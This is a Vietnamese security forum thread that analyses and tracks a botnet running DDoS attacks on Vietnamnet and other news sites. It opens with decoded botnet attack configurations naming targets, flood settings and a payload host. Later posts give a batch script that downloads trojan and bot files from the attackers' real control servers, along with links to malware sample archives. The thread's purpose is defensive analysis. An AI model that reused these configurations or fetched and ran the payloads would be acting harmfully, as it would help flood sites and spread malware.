UAC+80;//HEA+User-Agent: Opera/9.80 (Windows NT 5.1; U; en) Presto/2.7.62 Version/11.01;//HEA+Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1;//HEA+Accept-Language: en-US,en;q=0.9;//HEA+Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1;//HEA+Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0;//HEA+Referer: ;//HEA+Cookie: <51hqVbyn5d=>;//HEA+Connection: Keep-Alive, TE;//\;/\
UAC+80;//HEA+Accept: */*;//HEA+Referer: ;//HEA+Accept-Language: en-us;//HEA+User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727);//HEA+Accept-Encoding: gzip, deflate;//HEA+Connection: close;//HEA+Cache-Control: no-cache;//HEA+Cookie: <51hqVbyn5d=>;//\;/\
UAC+80;//HEA+Accept: */*;//HEA+Referer: ;//HEA+Accept-Language: en-US;//HEA+User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729);//HEA+Accept-Encoding: gzip, deflate;//HEA+Connection: Keep-Alive;//HEA+Cookie: <51hqVbyn5d=>;//\;/\
PRE+443;//DOM+vietnamnet.vn;//ITS+http://vietnamnet.vn/;//RET+http://vietnamnet.vn/vn/index.html;//REP+http://vietnamnet.vn/vn/index.html;//LIP+;//RIP+;//PRT+80;//PRP+;//PRD+;//PP2+;//PD2+;//VER+;//THE+5;//CON+30;//ANT+10;//EST+50;//MSP+;//MRP+;//LSL+;//LST+;//NOD+;//FOL+1;//FOM+5;//REF+1;//IGN+0;//ENC+;//SLE+1;//CRF+1;//CRL+1;//CRA+1;//BAC+1;//RAN+0;//CCR+20;//CCK+15;//FRE+;//FOR+1;//MAX+;//TIM+;//IZE+0;//KAT+;//JaJ+1;//FIR+0;//JOP+o;//JIN+325;//JAX+350;//JSI+;//FUN+0;//\;/\
PRE+443;//DOM+vietnamnet.vn;//ITS+http://vietnamnet.vn/;//RET+http://vietnamnet.vn/vn/index.html;//REP+http://vietnamnet.vn/vn/index.html;//LIP+;//RIP+vietnamnet.vn:80:117.103.197.249;//PRT+80;//PRP+;//PRD+;//PP2+;//PD2+;//VER+;//THE+5;//CON+30;//ANT+10;//EST+60;//MSP+;//MRP+;//LSL+;//LST+;//NOD+;//FOL+1;//FOM+5;//REF+1;//IGN+0;//ENC+;//SLE+1;//CRF+1;//CRL+1;//CRA+1;//BAC+1;//RAN+0;//CCR+20;//CCK+15;//FRE+;//FOR+1;//MAX+;//TIM+;//IZE+0;//KAT+;//JaJ+1;//FIR+0;//JOP+o;//JIN+325;//JAX+350;//JSI+;//FUN+0;//\;/\
PRE+443;//DOM+vietnamnet.vn;//ITS+http://vietnamnet.vn/vn/index.html;//RET+;//REP+;//LIP+;//RIP+vietnamnet.vn:80:123.30.133.166;//PRT+80;//PRP+;//PRD+;//PP2+;//PD2+;//VER+;//THE+5;//CON+45;//ANT+10;//EST+120;//MSP+;//MRP+;//LSL+;//LST+;//NOD+;//FOL+1;//FOM+5;//REF+1;//IGN+0;//ENC+DES;//SLE+1;//CRF+1;//CRL+1;//CRA+1;//BAC+0;//RAN+0;//CCR+20;//CCK+300;//FRE+;//FOR+1;//MAX+;//TIM+;//IZE+1;//KAT+;//JaJ+0;//FIR+0;//JOP+a;//JIN+325;//JAX+350;//JSI+;//FUN+0;//\;/\
PRE+443;//DOM+vietnamnet.vn;//ITS+http://vietnamnet.vn/vn/index.html;//RET+;//REP+;//LIP+;//RIP+vietnamnet.vn:80:123.30.184.10;//PRT+80;//PRP+;//PRD+;//PP2+;//PD2+;//VER+;//THE+5;//CON+35;//ANT+10;//EST+120;//MSP+;//MRP+;//LSL+;//LST+;//NOD+;//FOL+1;//FOM+5;//REF+1;//IGN+0;//ENC+DES;//SLE+1;//CRF+1;//CRL+1;//CRA+1;//BAC+0;//RAN+0;//CCR+20;//CCK+300;//FRE+;//FOR+1;//MAX+;//TIM+;//IZE+1;//KAT+;//JaJ+0;//FIR+0;//JOP+a;//JIN+325;//JAX+350;//JSI+;//FUN+0;//\;/\
PRE+443;//DOM+tuanvietnam.vietnamnet.vn;//ITS+http://tuanvietnam.vietnamnet.vn/;//RET+;//REP+;//LIP+;//RIP+;//PRT+80;//PRP+;//PRD+;//PP2+;//PD2+;//VER+;//THE+8;//CON+40;//ANT+10;//EST+150;//MSP+;//MRP+;//LSL+;//LST+;//NOD+;//FOL+1;//FOM+5;//REF+1;//IGN+;//ENC+;//SLE+1;//CRF+1;//CRL+1;//CRA+1;//BAC+1;//RAN+0;//CCR+20;//CCK+15;//FRE+;//FOR+;//MAX+;//TIM+;//IZE+1;//KAT+;//JaJ+0;//FIR+0;//JOP+a;//JIN+325;//JAX+350;//JSI+;//FUN+0;//\;/\
PRE+443;//DOM+vef.vn;//ITS+http://vef.vn/;//RET+;//REP+;//LIP+1;//RIP+;//PRT+80;//PRP+;//PRD+;//PP2+;//PD2+;//VER+;//THE+8;//CON+30;//ANT+10;//EST+150;//MSP+;//MRP+;//LSL+;//LST+;//NOD+;//FOL+1;//FOM+5;//REF+1;//IGN+;//ENC+;//SLE+1;//CRF+1;//CRL+0;//CRA+0;//BAC+1;//RAN+0;//CCR+20;//CCK+15;//FRE+;//FOR+;//MAX+;//TIM+;//IZE+1;//KAT+;//JaJ+0;//FIR+0;//JOP+a;//JIN+325;//JAX+350;//JSI+;//FUN+0;//\;/\
PRE+443;//DOM+m.vietnamnet.vn;//ITS+http://m.vietnamnet.vn/vn/index.html;//RET+;//REP+;//LIP+1;//RIP+;//PRT+80;//PRP+;//PRD+;//PP2+;//PD2+;//VER+;//THE+3;//CON+30;//ANT+10;//EST+120;//MSP+;//MRP+;//LSL+;//LST+;//NOD+;//FOL+1;//FOM+5;//REF+1;//IGN+;//ENC+;//SLE+1;//CRF+1;//CRL+0;//CRA+0;//BAC+1;//RAN+0;//CCR+30;//CCK+20;//FRE+;//FOR+;//MAX+;//TIM+;//IZE+1;//KAT+;//JaJ+0;//FIR+0;//JOP+o;//JIN+;//JAX+;//JSI+;//FUN+0;//\;/\
PRE+443;//DOM+vietnamweek.net;//ITS+http://vietnamweek.net/;//RET+;//REP+;//LIP+1;//RIP+;//PRT+80;//PRP+1;//PRD+;//PP2+;//PD2+;//VER+;//THE+3;//CON+35;//ANT+10;//EST+120;//MSP+;//MRP+;//LSL+;//LST+;//NOD+;//FOL+1;//FOM+2;//REF+1;//IGN+;//ENC+;//SLE+1;//CRF+1;//CRL+1;//CRA+1;//BAC+1;//RAN+0;//CCR+20;//CCK+20;//FRE+;//FOR+;//MAX+;//TIM+;//IZE+0;//KAT+;//JaJ+0;//FIR+0;//JOP+o;//JIN+;//JAX+;//JSI+;//FUN+0;//\;/\
PRE+443;//DOM+option.drfound.net;//ITS+http://option.drfound.net/k113.css;//LIP+;//RIP+;//PRT+80;//PRP+;//PRD+;//PP2+;//PD2+;//THE+1;//CON+100;//EST+1500;//NOD+1;//FOL+0;//REF+0;//ENC+RSA;//SLE+30;//BAC+0;//RAN+0;//CCR+;//CCK+;//FRE+;//FOR+;//MAX+;//POC+89;//PAT+AppData;//FLE+iTunes.tmp;//SIE+1054208;//JaJ+0;//FIR+0;//JOP+o;//JIN+;//JAX+;//JSI+;//FUN+0;//\;/\

Lần này, sau khi đọc topic này, mấy anh thêm cái http://tuanvietnam.vietnamnet.vn vào danh sách mục tiêu, triệt đường VNN hết à ? Khốn nạn thật, tìm đủ cách để DDOS VNN ngay cả khi đã bị vạch trần, phanh phui. Các cơ quan chức năng của Vietnam ta đâu rồi, nhắm mắt làm ngơ hết rồi à, nhận được lệnh rồi à ?

Phân tích tính chất vài trận DDoS HVA vừa qua.

mv1098 — GMT

anh em nào yêu thể thao thì vào đây xem tạm http://thethao.vietnamnet.vn/ :D không biết mấy anh STL có add nốt vào danh sách ko nữa

Phân tích tính chất vài trận DDoS HVA vừa qua.

docong1010 — GMT

mrquytk93 wrote:

Sau vài lần lướt web thì thấy topic này có vẻ rất " HOT " Chuyển sang chủ để chính luôn, là HVA có biện pháp gì mới để chống hay không Chứ phân tích cái này rồi cuối cùng vẫn bị DIE thì hơi chán Khoảng đầu tháng 9 mình muốn HVA nghiên cứu sâu hơn về synflood Vì hiện tại với synflood mình có thể cho HVA die bất cứ lúc nào ------------------------------------------------------------------------- Mr.Quy CBG.No1 ADMIN - ATH

Bồ này hay nhỉ khẳng định như thế và tự tin vào khả năng của mình quá nhé. .HI Anh TQN Hiện nay một số server đặt tại FPT nhiễm con SbieMgsdfsdfsdfm.dll , SbieSvdsfsdfc.exe e nghĩ hai con này giống như anh đã phân tích. Nó cũng DDOS tới Vietnamnet. 2 con này nó nằm trong Program file và folder có tên là Sandboxie. Mấy admin nào dùng 2k3, 2k8 xem thử có không nhá.

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Coi như toàn bộ Vietnamnet tê liệt rồi. Vào trang thethao.vietnamnet.vn cũng không được luôn, trắng nhách. Sùng gan rồi nha ! Mấy ông nội "quăng bom" BKIS trốn đâu hết rồi, sao không ra mặt đi. Cái chuyện ở Hàn Quốc xa lắc xa lơ không ai nhờ, mấy ông "bồ chao" nhảy vô check chiếc bậy bạ, hắc hiết lung tung rồi la làng la xóm, quãng cáo trên báo đài. Sao vụ này mấy ông im re vậy ? Đại dịch ở VN đấy, người Việt phản động, bán nước cho tàu đánh người Việt đấy, sao không nhảy vô. Còn cái đám "Sứ giả thiện chiến" (cãi) của BKAV nữa, biến luôn đi cho em nhờ, đi đâu cũng quãng cáo được hết. Một số lượng rất lớn "mèo què, mèo đui, mèo cụt" của stl như vậy, em bị stress nặng rồi, rce sơ sài, không hết nổi, không tới nơi tới chốn, ngay cả bản thân mình cũng bực. Bà con nào muốn học, thực tập RCE, "mèo què" analysis, cứ lên thư mục này download từng con về thực tập, vừa giúp mọi người luôn: http://www.mediafire.com/?tz745o0f678w8 Sorry bà con, em tức quá rồi ! Còn mấy thằng coder của stl, tụi mày giải nghệ đi cho tao nhờ, quay đi quay lại chỉ biết có CString không, chỉ biết ăn cắp code, đạo code không hả. Code như tụi mày cả năm nay rồi chả có lên tay gì hết. Nghỉ quách đi ! Tốn tiền của dân ngu cu đen như tụi tao. Tụi tao đóng thuế để nuôi cái đám bất tài vô tướng, mất đạo đức như tụi mày hả ? Nhà nước cho thằng nào trong tụi mày đi du học chỉ có uổng cơm uổng gạo, tốn tiền, tụi mày về chả đóng góp gì cho nhân dân hết, lại còn phá hoại, bán nước nữa. Tụi mày thức tỉnh đi, quay đầu đi ! Code thì chỉ 3, 4 hàm, còn CString thì tới mấy chục hàm. Anh em cùng công ty của tôi đang đọc topic này nhớ không, hồi đó coder nào dưới quyền em mà đụng một chút là CString là em phang ngay, bắt sữa ngay, anh em hồi đó la làng la xóm, ông TQN khó quá ;) Thôi, chữi vậy đủ rồi, quay lại PatchDiff tiếp cái IAStoreUIHelper.dll cái. Một lát nữa em sẽ cho ra cái địa chỉ mà thằng nằm vùng này down con bot về.

Phân tích tính chất vài trận DDoS HVA vừa qua.

mv1098 — GMT

@anh TQN em dùng DNS của Google mạng FPT vẫn vào ngon anh à

Phân tích tính chất vài trận DDoS HVA vừa qua.

trycatch — GMT

TQN wrote:

Bà con tạo một thư mục Tracker chẵng hạn, chép đoạn bat file này vào file tracker.bat. Lâu lâu mấy bác buồn buồn không biết làm gì thì Enter nó giùm em một cái. Code:
@echo off
echo ===============================================================================
echo Download cac file trojan, bot va DDOS config files cua stl dang DDOS Vietnamnet
echo ===============================================================================
echo.
wget -t3 "http://wide.ircop.cn/index.txt?113" -O wide.ircop.cn_index.txt
wget -t3 "http://pref.firebay.cn/index.txt?113" -O pref.firebay.cn_index.txt
wget -t3 "http://daily.leteaks.com/index.txt?113" -O daily.leteaks.com_index.txt
wget -t3 "http://link.susaks.com/index.txt?113" -O link.susaks.com_index.txt
wget -t3 "http://option.drfound.net/k113.css"

pause
Đoạn bat này sẽ download các file trên về. Sau đó các bạn tạo thêm 1 thư mục chứa ngày tháng mà các bạn down các file trên về, vd: 26_08_2011, chép các file đã download được vào đó. Định kỳ compare một lần, nếu có thấy thay đổi nội dung một trong các file thì báo lên cho bà con biết giùm, còn giống hết thì xoá đi. Cảm ơn bà con tham gia giúp theo dõi. Một mình em cứ chạy tracker 1 đống luôn, compare nữa thì mệt quá, code tool tự động thì lười, thôi thì chịu khó bat file vậy.

Hi TQN, Chỉ trong vòng 1h vừa qua đã có sự thay đổi trong file pref.firebay.cn_index.txt link: lúc 14h30: http://www.mediafire.com/?lq1cuttlt7etb2n lúc 15h30: http://www.mediafire.com/?724ayc0ic5xa8c1

Phân tích tính chất vài trận DDoS HVA vừa qua.

cayaoanh830 — GMT

Làm sao để Decode mấy file _index vậy mấy ơi. Em thấy 4 file _index khi chưa decode có nội dung y như nhau. PS: Vừa nảy vào thì HVA báo là "máy chủ đóng vai trò là gateway hoặ Proxy nhưng kông nhận ... máy chủ ở trên" gì đó là gì vậy các anh.

Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 — GMT

v74 wrote:

con số hoạt động biến hoá nếu làm theo cách của admin thì quá dể nhưng không biết một lần tiêu diệt hết không hay để lại tàn dư ....ập vào thì ta kéo ra..một lần hay một cái thi có trời mới biết

Không có chuyện chỉ có "trời" mới biết đâu bạn :-) . Quan trọng nhất là có phát hiện ra máy tính hay mạng của mình đã và đang bị tấn công hoặc khai thác hay không thôi. Còn khi đã phát hiện rồi mà không khắc phục được thì hoặc là trình độ non kém, hoặc là lười nhác và vô trách nhiệm với bản thân và xã hội.

Phân tích tính chất vài trận DDoS HVA vừa qua.

template — GMT

TQN wrote:

À sẵn tiện nhờ bà con tư vấn cái: vốn em rất lạc hậu về công nghệ, cái máy em đang dùng đây đã gần 10 năm rồi, mua từ 2002, giờ nó tàn và cùi bắp lắm, mới thay bộ nguồn mà ưng là nó restart cái bụp (xe em đi đã 12 năm rồi thì sao, từ thời còn sv hàn vi). Em "phải" mua 1 cái laptop thôi, đi đâu mang theo, chớ ngồi ở nhà hoài bỏ công bỏ việc hết. Bà con biết chổ nào bán máy laptop xài được, màn hình to to, bàn phím bự bự, chất lượng, giá cã phù hợp giới thiệu em một cái. Không cần mạnh đâu, chỉ cần lướt web, vào HVA post bài, theo dõi giá vàng và RCE, code bậy bạ thôi. Cảm ơn trước nhé !

Bác vào đây tự build cấu hình hết theo ý mình : http://thinkpadstyle.com/

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Chiều nay, nghỉ RCE, đi nhậu với thằng em rể. Vài lời với mấy anh em stl: Tôi, anh em HVA này, và các bạn, toàn là người Việt thôi. Tại sao phải đấu đá với nhau làm gì ???? Em biết mấy anh cũng có nổi khổ của mấy anh, đã là sống chết theo lệnh rồi thì mấy anh, cũng chỉ là những người làm công ăn lương thôi, bị lệnh từ sếp ở trên ban xuống, phải gồng mình mà cố gắng lỳ lợm, trơ gan ra để hoàn thành lệnh sếp giao. Nhưng em cũng thừa biết mấy anh cũng phải miễn cưỡng mà làm thôi, vì miếng cơm manh áo, tiền bạc, gạo tiền, vợ con, gia đình thôi, phải không mấy anh em stl. Mấy anh em cũng giỏi lắm, em phải khen, rất giỏi (em chưa từng khen ai cả trong IT). Nhưng mấy anh ơi, quay đầu là bờ, mình phải cam tâm làm tay sai cho tàu khựa, bán nước, phản động, hại đồng loại của mình tới bao giờ nữa ??? Em mong mấy anh hảy bình tâm suy nghĩ lại đi ! Tới chiều nay, em chợt nghĩ lại, em tự nhiên thấy thương mấy anh quá, cùng là người Việt, cùng là dân IT với nhau, chỉ vì mấy thằng sếp bán nước mà anh em ta phải quay ra đấu đá lẫn nhau, truy cùng đuổi tận. Nếu lỡ có chuyện gì, thì chỉ mấy anh em ta là con tốt thí mạng, vắt chanh bỏ vỏ mà thôi. Chỉ nên chữi mấy thằng tàu nham hiểm, thâm độc đang nắm đầu mấy sếp của tụi anh thôi. Vài lời chân tình, mong mấy anh em stl hiểu giùm tôi. Lần này, tôi nói rất chân tình, mong mấy anh em stl hiểu ! Mấy anh em nên nhớ, chúng ta cùng là người Việt, cùng nòi giống con Rồng cháu Tiên nhé. Hảy suy nghĩ lại đi, mấy anh em stl của tôi ơi ! Hảy cùng nhau phản đối, kiến nghị, đình công, biểu tình... lên mấy sếp của mấy anh, dừng ngay các hành động phạm pháp, xấu xa, đồi bại này lại. Em biết, chính quyền nào cũng có những tổ chức như mấy anh, nhưng đừng làm quá lắm. Mục tiêu "ổn định chính trị" của mấy anh, em công nhận là đúng, nhưng đừng dùng những hành động phạm pháp, đê hèn, xấu xa như vậy. Nếu không vì những hành động ấy, đường anh anh đi, đường em em đi. Em nói vậy mấy anh stl có hiểu không ?

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

2 phuongnvt: Dạ em đang buôn bán vàng, ngoại tệ trên mạng đó anh Hai ! Chỉ mong anh em, đồng bào stl đọc thật kỹ bài post vừa rồi của em ! Anh em ta và anh em stl hảy dừng tay lại đi. Đừng đấu đá với nhau nữa. Em và anh em HVA cũng mệt mỏi lắm rồi, anh em stl cũng vậy phải không ? Mắc mớ cái gì mà phải cam tâm đi làm tay sai cho tụi chó tàu khựa thâm độc, quỷ quyệt đó hả, anh em stl, rồi lại cõng rắn cắn gà nhà, đi hại chính đồng bào ruột thịt của mình ??? À, Avira vừa gởi cho em cái link này: http://analysis.avira.com/samples/details.php?uniqueid=KcAZAjtnOS4VD6kgfsrWYGchX1gq6Lvn&incidentid=810740. Từ từ rồi anh em stl của tôi sẽ thấy là mấy anh bị mất chân, mất tay dần dần đấy ! Chiều nay, tự nhiên thấy mệt mỏi, chán nãn quá rồi ! Bà con có hiểu tâm trạng của em không ? Hết chuyện làm rồi sao mà phải quay ra đấu đá giữa những người Việt lẫn nhau ??????????????????????????????????????????????????????????????????????????????????????? Em làm những việc RCE này chả vì nổi tiếng, tiền bạc gì cả. Thấy sai, bất bình là em nhảy vô. Từ lúc em theo mấy anh st tới giờ, mất nhiều hơn được. Nhưng em vẫn hài lòng, em đang làm đúng, làm theo lương tâm, đạo đức của 1 thằng IT thất nghiệp, nữa mùa như em, mấy anh stl hiểu không ? Mấy anh cứ việc chống phá những người "lề trái", các trang "lề trái", đó là việc mấy anh phải làm. Nhưng hành động cài cắm malwares, trojan, keylog trên các máy tính của người VN, biến các máy tính đó thành zombies của mấy anh là em không chấp nhận. Nhắc lại, em không chấp nhận. Việc của mấy anh, mấy anh cứ làm, đừng ảnh hưởng, gây hại tới người khác nhé. Em nói mấy anh stl hiểu không ? Mail của em: thang.cu.anh@gmail.com: hộp mail bí mật, mấy anh có gì trao đổi cứ mail cho em !

Phân tích tính chất vài trận DDoS HVA vừa qua.

quygia128 — GMT

Thấy chỉ một mình anh làm cái việc phân tích và làm rõ vụ này em thật sự khâm phục anh, khâm phục ở nhiều khía cạnh chứ không chỉ vấn đề kỹ thuật không. Mong rằng chuyện này sẽ kết thúc sớm vì nó đã kéo dài khá lâu rồi ( tuy biết rằng khi nó kết thúc thì không còn được đọc những bài phân tích kỹ thuật như thế này nữa :( ) Ủng hộ anh hết mình :D

Phân tích tính chất vài trận DDoS HVA vừa qua.

TMDTHBC — GMT

2 TQN, Tôi có thể sử dụng blogspot của a để post cảnh báo về tiến trình ddos này được không vậy? Có 1 số bạn bè họ không thể truy cập được hvaonline.net (hầu hết đều làm việc tại các cao ốc trong Q1). Tôi không hiểu là do firewall của admin chặn hay lý do gì khác (tôi ở ngoài quán cafe thì lại ok). Mong a trả lời sớm vì họ khá quan tâm vấn đề này và vietnamnet.vn - vietnamweek là các trang ưu tiên khi bootup.

Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 — GMT

TMDTHBC wrote:

2 TQN, Tôi có thể sử dụng blogspot của a để post cảnh báo về tiến trình ddos này được không vậy? Có 1 số bạn bè họ không thể truy cập được hvaonline.net (hầu hết đều làm việc tại các cao ốc trong Q1). Tôi không hiểu là do firewall của admin chặn hay lý do gì khác (tôi ở ngoài quán cafe thì lại ok). Mong a trả lời sớm vì họ khá quan tâm vấn đề này và vietnamnet.vn - vietnamweek là các trang ưu tiên khi bootup.

Anh phải bảo họ từ trang chủ vào forum HVAOnline, rồi mới copy link anh gửi vào trình duyệt thì họ mới xem được nội dung.

Phân tích tính chất vài trận DDoS HVA vừa qua.

xnohat — GMT

TMDTHBC wrote:

2 TQN, Tôi có thể sử dụng blogspot của a để post cảnh báo về tiến trình ddos này được không vậy? Có 1 số bạn bè họ không thể truy cập được hvaonline.net (hầu hết đều làm việc tại các cao ốc trong Q1). Tôi không hiểu là do firewall của admin chặn hay lý do gì khác (tôi ở ngoài quán cafe thì lại ok). Mong a trả lời sớm vì họ khá quan tâm vấn đề này và vietnamnet.vn - vietnamweek là các trang ưu tiên khi bootup.

Chuyện các cao ốc ở Q1 chặn HVA tôi có biết. Một số anh em làm quản trị các hệ thống mạng của một số doanh nghiệp lo sợ rằng, nhân viên sẽ lên HVA tham khảo các thông tin hack hiếc này nọ và làm chuyện khuất tất trên hệ thống mạng của họ. Nhưng cái gì cũng có mặt trái của nó, tuần qua tôi có gặp vài mạng doanh nghiệp có nhiễm bot của STL ( phiên bản lây nhiễm qua Unikey fake )

Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 — GMT

Có lẽ bạn đọc chủ đề này sẽ quan tâm đến bài viết sau: CHIẾN LƯỢC VỀ TÁC CHIẾN TRONG KHÔNG GIAN MẠNG CỦA BỘ QUỐC PHÒNG MỸ http://ubuntuone.com/p/15a5/ http://www.defense.gov/news/d20110714cyber.pdf

Phân tích tính chất vài trận DDoS HVA vừa qua.

whitesnow19 — GMT

TQN wrote:

@echo off
echo ===============================================================================
echo Download cac file trojan, bot va DDOS config files cua stl dang DDOS Vietnamnet
echo ===============================================================================
echo.
wget -t3 "http://wide.ircop.cn/index.txt?113" -O wide.ircop.cn_index.txt
wget -t3 "http://pref.firebay.cn/index.txt?113" -O pref.firebay.cn_index.txt
wget -t3 "http://daily.leteaks.com/index.txt?113" -O daily.leteaks.com_index.txt
wget -t3 "http://link.susaks.com/index.txt?113" -O link.susaks.com_index.txt
wget -t3 "http://option.drfound.net/k113.css"

pause

Em làm theo anh mà thằng avira của em nó nhai mất k113.css rồi. Hic

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Sao lại hic em, Avira nhai mất k113.css là mừng đấy chứ em. Avira đã gởi mail cho anh rồi mà. Bà con cracker nào đang dùng P32Dasm không ? Author của tool này là Darker, bạn của em, key member của Avira Malware Analysis Team đấy !

Phân tích tính chất vài trận DDoS HVA vừa qua.

TMDTHBC — GMT

xnohat wrote:

TMDTHBC wrote:

2 TQN, Tôi có thể sử dụng blogspot của a để post cảnh báo về tiến trình ddos này được không vậy? Có 1 số bạn bè họ không thể truy cập được hvaonline.net (hầu hết đều làm việc tại các cao ốc trong Q1). Tôi không hiểu là do firewall của admin chặn hay lý do gì khác (tôi ở ngoài quán cafe thì lại ok). Mong a trả lời sớm vì họ khá quan tâm vấn đề này và vietnamnet.vn - vietnamweek là các trang ưu tiên khi bootup.
Chuyện các cao ốc ở Q1 chặn HVA tôi có biết. Một số anh em làm quản trị các hệ thống mạng của một số doanh nghiệp lo sợ rằng, nhân viên sẽ lên HVA tham khảo các thông tin hack hiếc này nọ và làm chuyện khuất tất trên hệ thống mạng của họ. Nhưng cái gì cũng có mặt trái của nó, tuần qua tôi có gặp vài mạng doanh nghiệp có nhiễm bot của STL ( phiên bản lây nhiễm qua Unikey fake )

Vâng đúng thế a à, tôi vọoc chơi thì thấy đa phần đều dính con adobe... KIS có bản quyền hẳn hoi nhưng là officer thì ... hehehe sorry không có chuyện update KIS (rất buồn cười-họ có cả 1 room IT 5 người đấy ). Nhưng hậu quả của việc đó là ... phải đi làm "chùa" dùm sếp vì sếp muốn xem IT của họ làm gì ... hehehe tôi bảo đọc hva để biết thì ..... xin lỗi botay.com ( đã "không biết" mà còn đóng cửa dạy nhau thì ...)

Phân tích tính chất vài trận DDoS HVA vừa qua.

lovezee — GMT

Mới nãy em vào HVA bằng IE7 và wwwected qua "null", vào bằng các trình duyệt khác thì vẫn bình thường. Có thể anh conmale chặn again của IE chăng? Vì đa số ITs hiện giờ dùng FF hoặc GC. PS : chỉ là phỏng đoán :)

Phân tích tính chất vài trận DDoS HVA vừa qua.

o.O.o — GMT

Thấy các anh up mẫu cho mấy hãng antivirus khác mà chưa thấy ai nhắc đến đã gửi cho Avast, thằng này hiện em đang dùng, các mẫu down về quét cứ trơ ra đó ah. Đã gửi mẫu qua mail virus@avast.com mà không thấy nó phản hồi gì hết, lần trước em gửi 1 đống mẫu trên link của anh TQN up cả tuần nay mà chẳng thấy nó phản hồi Chiều em thử send cho nó vài mẫu faceItune nữa, ko biết nó có chịu phân tích và trả lời ko nữa

Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 — GMT

o.O.o wrote:

Thấy các anh up mẫu cho mấy hãng antivirus khác mà chưa thấy ai nhắc đến đã gửi cho Avast, thằng này hiện em đang dùng, các mẫu down về quét cứ trơ ra đó ah. Đã gửi mẫu qua mail virus@avast.com mà không thấy nó phản hồi gì hết, lần trước em gửi 1 đống mẫu trên link của anh TQN up cả tuần nay mà chẳng thấy nó phản hồi Chiều em thử send cho nó vài mẫu faceItune nữa, ko biết nó có chịu phân tích và trả lời ko nữa

Avast chuyên nhận mẫu mà không phản hồi đấy bạn ;) .

Phân tích tính chất vài trận DDoS HVA vừa qua.

learningandlearning — GMT

Em có làm theo anh TQN có lúc đầu có 5 file, sau tăng lên 6 file, mà dường như ai đó chỉ copy file k113.css thành k113.css.1 cho đỡ buồn ^^.

http://www.mediafire.com/download.php?sib1p2b2m2g611o

Phân tích tính chất vài trận DDoS HVA vừa qua.

learningandlearning — GMT

File: pref.firebay.cn_index.txt bị sửa lại dung lượng thành 0 KB Thôi em ngủ ^^ P/S: file k113.css.1 là do em không xoá khi chạy lại file Traker.bat. Sorry anh em.

Phân tích tính chất vài trận DDoS HVA vừa qua.

phanledaivuong — GMT

mrquytk93 wrote:

Sau vài lần lướt web thì thấy topic này có vẻ rất " HOT " Chuyển sang chủ để chính luôn, là HVA có biện pháp gì mới để chống hay không Chứ phân tích cái này rồi cuối cùng vẫn bị DIE thì hơi chán Khoảng đầu tháng 9 mình muốn HVA nghiên cứu sâu hơn về synflood Vì hiện tại với synflood mình có thể cho HVA die bất cứ lúc nào ------------------------------------------------------------------------- Mr.Quy CBG.No1 ADMIN - ATH

Nghĩ cũng buồn. Con ếch con ngồi đáy giếng hênh hoang với mấy con nòng nọc quen rồi =)) giờ vừa hóng hớt lên bờ tý thì lại định mang mấy cái bài ộp oạp ra đây =)). cậu không cần phải khoe admin cái ATH hay là cái CBG nhà cậu ra. ở hva cậu chả là cái gì cả. còn muốn vài cái code đểu synflood cho mấy đứa học lập trình 3 tháng nó code ý thì về cái 4rum nhà cậu mà nói với mấy con nòng nọc. cậu làm luôn tháng 8 đi. không cần đợi đến tháng 9 đâu :|. ngày xưa không biết cái thời người ta làm mấy cái trò đấy chắc là cậu còn "chùi đít chưa sạch". có 1 gợi ý là muốn người khác nghĩ mình giỏi thì cách hay nhất là hãy "chém gió" trước 1 đám người ng* hơn mình :| cậu chọn nhầm chỗ rồi #:S

mv1098 wrote:

mrquytk93 này mình nhớ không nhầm thì cũng nổi tiếng với vụ botnet qua IRC mà bị mấy bro an ninh mạng mời tới uống trà đá rồi.

mấy con gà mới bị mời thôi mà bạn. chứ pro như các anh STL thì có khi an ninh mạng cũng sợ mấy anh ý hack ý chứ. chắc là cách đấy 5 năm nếu thấy cậu này hô thế mình cũng tung hô cậu ta lắm đấy :( tiếc là cậu ta sinh muộn 5 năm

Phân tích tính chất vài trận DDoS HVA vừa qua.

whatissecurity — GMT

mrquytk93 wrote:

Sau vài lần lướt web thì thấy topic này có vẻ rất " HOT " Chuyển sang chủ để chính luôn, là HVA có biện pháp gì mới để chống hay không Chứ phân tích cái này rồi cuối cùng vẫn bị DIE thì hơi chán Khoảng đầu tháng 9 mình muốn HVA nghiên cứu sâu hơn về synflood Vì hiện tại với synflood mình có thể cho HVA die bất cứ lúc nào ------------------------------------------------------------------------- Mr.Quy CBG.No1 ADMIN - ATH

Mình theo dỗi topic này từ những ngày đầu.Thấy khâm phục những gì mà TQN cũng như conmale,PXMMRF và các thành viên HVA khác đã làm.Để cho chúng ta ở đây hiểu rõ hơn bản chất của sự việc. Mr.Quy bạn quá kêu ngoạo về bản thân mình rồi đó.Chỉ giỏi hack local,UG,chọc phá site người khác, viết mấy con bot dùng autoit điều khiển qua IRC , web gì của bạn chẳng khác nào scriptkid.Không biết có viết được không hay dùng lại của người khác :) Lần trước Deface site của mình còn xoá cả data cũng may là bên mình có backup.Xong rồi còn giở trò botnet nữa chứ.Chẳng có gì hay ho đâu nhé.Xin lỗi các thành viên HVA mình đã làm loãng chủ đề nhưng mình muốn lên án hành động thiếu ý thức của MR.Quy vì cộng đồng IT VN.

Phân tích tính chất vài trận DDoS HVA vừa qua.

Lincoln — GMT

Mail từ Microsoft Malware Protection Center về DDoS tool mạo danh IAStore của Intel , hình như họ không nhận ra đây là malware .

